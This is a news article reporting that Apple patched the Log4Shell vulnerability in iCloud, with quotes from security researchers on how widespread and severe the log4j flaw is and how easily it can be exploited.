Apple has patched the Log4Shell iCloud vulnerability, which was revealed last week. A security hole in the open-source tool log4j put millions of apps at risk. Cybersecurity experts described the vulnerability as “the most critical security vulnerability in a decade.”
Log4j is an open-source logging tool widely used by both websites and apps. As reported on 9to5Mac:
A new exploit called “Log4Shell” has been giving security teams at large technology companies a headache. When exploited, the vulnerability lets hackers run malicious code on vulnerable servers, and it can reportedly affect platforms such as iCloud and Steam.
As detailed by security company LunaSec (via the Verge), the vulnerability was first found in log4j, an open-source library used by multiple apps and websites for logging – which is the process of keeping a list of performed activities in order to review them later for fixing bugs or other errors.
According to security researcher Marcus Hutchins, Log4Shell could affect millions of apps around the world as the log4j library is widely used by developers.
It’s extremely easy for an attacker to use the Log4Shell exploit.
To exploit the vulnerability, an attacker has to cause the application to save a special string of characters in the log. Since applications routinely log a wide range of events — such as messages sent and received by users, or the details of system errors — the vulnerability is unusually easy to exploit and can be triggered in a variety of ways.
Apple’s iCloud was one of the services that were vulnerable to the exploit, and Apple, Microsoft, and others quickly patched it.
According to the Eclectic Light Company, Apple has patched the iCloud hole. The site reports that researchers were able to demonstrate the vulnerability when connecting to iCloud through the web on December 9 and December 10, the same vulnerability no longer worked on December 11. The exploit doesn’t appear to have affected macOS.
The vulnerability was exploited in Minecraft before Microsoft patched it over the weekend […]
Crowdstrike’s Adam Meyers said the vulnerability has been “fully weaponized” and tools were readily available to exploit it. “The internet’s on fire right now,” he added shortly after the exploit was made public.
The Apache Software Foundation, which runs the project, rated it a 10 on its risk scale due to the ease of which it could be exploited and the widespread nature of the tool […] CEO of cybersecurity firm Tenable Amit Yoran called it “the single biggest, most critical vulnerability of the last decade.”